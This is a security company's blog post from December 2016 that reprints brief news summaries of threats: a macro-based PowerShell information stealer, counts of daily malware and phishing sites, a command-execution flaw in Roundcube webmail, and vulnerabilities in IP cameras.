Gotham Security Daily Threat Alerts

By Nancy Rand
Posted in Security
On December 09, 2016

December 8, SecurityWeek – (International) August stealer uses PowerShell for fileless infection. Proofpoint security researchers warned that a new information stealing malware, dubbed August leverages Microsoft Word documents containing malicious macros, which once enabled, launch a PowerShell command to download and install the August stealer on a machine for a fileless infection. The malicious payload is downloaded from a remote site as a PowerShell byte array, and targets customer service and managerial staff at retail stores to steal credentials and sensitive documents from the affected devices. Source

December 8, Help Net Security – (International) 323,000 pieces of malware detected daily. Kaspersky Lab reported that the number of new malware files detected by its products increased to 323,000 per day in 2016, an increase of 13,000 from the amount of files detected in 2015. Source

December 7, Help Net Security – (International) Over 400,000 phishing sites have been observed each month during 2016. Webroot security researchers reported that phishing Websites have become more sophisticated and carefully crafted, as 84 percent of phishing sites observed in 2016 existed for less than 24 hours, making any organization or person susceptible to having sensitive information stolen. Webroot also found that during 2016, an average of more than 400,000 phishing Websites were observed each month and nearly all of the phishing URLs are hidden with benign domains, among other findings. Source

December 7, SecurityWeek – (International) Hackers can exploit Roundcube flaw by sending an email. RIPS Technologies discovered that Roundcube, an open source Webmail software was plagued with a critical vulnerability related to the Hypertext Preprocessor (PHP) function “mail()” that an attacker with access to the targeted system can exploit to execute arbitrary commands on the system by sending an email. The security firm found that the user input is not properly sanitized in the fifth parameter of the “mail()” function, which allows an attacker to pass arbitrary arguments and create a malicious PHP file in the system’s Web root directory, enabling the malicious actor to execute commands and conduct malicious activities. Source

December 7, SecurityWeek – (International) Hundreds of thousands of IP cameras exposed to IoT botnets. Cybereason security researchers reported that two zero-day flaws, including a combined authentication bypass and information disclosure bug affect hundreds of thousands of Internet Protocol (IP) cameras worldwide, making them susceptible to malware compromise, which could subsequently cause the devices to be ensnared into Internet of Things (IoT) botnets. An attacker can leverage the vulnerabilities to move the camera and see the images it is sending, as well as execute malicious code, and find other cameras plagued by the same vulnerabilities. Source

Above Reprinted from the USDHS Daily Open Source Infrastructure Report

Nancy Rand

Nancy Rand

Nancy has more than 20 years’ experience in information technology and security, solving business issues and implementing best-practice solutions that support organizational objectives. Her expertise includes leveraging, optimizing, and implementing diverse technology platforms, and management of large-scale technology projects.